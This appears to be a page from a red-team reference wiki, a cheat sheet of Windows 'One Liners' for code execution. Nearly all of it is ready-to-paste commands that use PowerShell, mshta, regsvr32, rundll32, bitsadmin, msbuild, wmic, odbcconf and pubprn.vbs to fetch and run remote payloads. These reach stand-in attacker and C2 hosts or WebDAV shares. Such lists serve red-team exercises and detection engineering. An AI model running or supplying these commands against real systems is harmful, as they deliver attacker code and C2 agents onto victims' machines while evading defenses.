The Red Team Vade Mecum
Search…
The Red Team Vade Mecum
The Red Team Vade Mecum
Techniques
Defense Evasion
Privilege Escalation
Enumeration
Execution
One Liners
Initial Access
Lateral Movement
Code Injection
Persistence
Infrastructure
SQL
Other
Windows Internals
Powered By GitBook
One Liners
Powershell:
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://attacker.com/payload.txt')|iex"
WMI:
wmic os get /format:https://evil/payload.xsl”
Regsvr32:
regsvr32 /u /n /s /i:http://evil/payload.sct scrobj.dll
regsvr32.exe /s /n /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll
Execute the specified remote .SCT script with scrobj.dll
regsvr32.exe /s /u /i:file.sct scrobj.dll
Execute the specified local .SCT script with scrobj.dll.
regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
MSHTA
mshta vbscript:Execute(“GetObject(“”scirpt:Http://evil/file.sct””)”)
mshta.exe http://<ip>/payload.hta
mshta.exe https://malicious.domain/runme.hta
Cscript:
cscript //E:jscript \\webdav\payload.txt
BITSADMIN:
cmd.exe c "bitsadmin transfer myjob download priority high http://ourc2server.com/download/c2agent.exe c:\agent.exe&start agent.exe"
bitsadmin /transfer mydownloadjob /download /priority normal http://<attackerIP>/xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe
MSbuild:
msbuild.exe //ip/malicious_code.csproj
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
RunDll32
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://attacker.com/payload.txt");window.close();
rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"
rundll32 \\webdavserver\folder\payload.dll,entrypoint
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
obcdconf(dll renamed to txt)
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
pubprn.vbs
cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:http://192.168.2.71/tools/mitre/proxy-script/proxy.sct
Techniques - Previous
Execution
Next - Techniques
Initial Access
Last modified 1yr ago
Copy link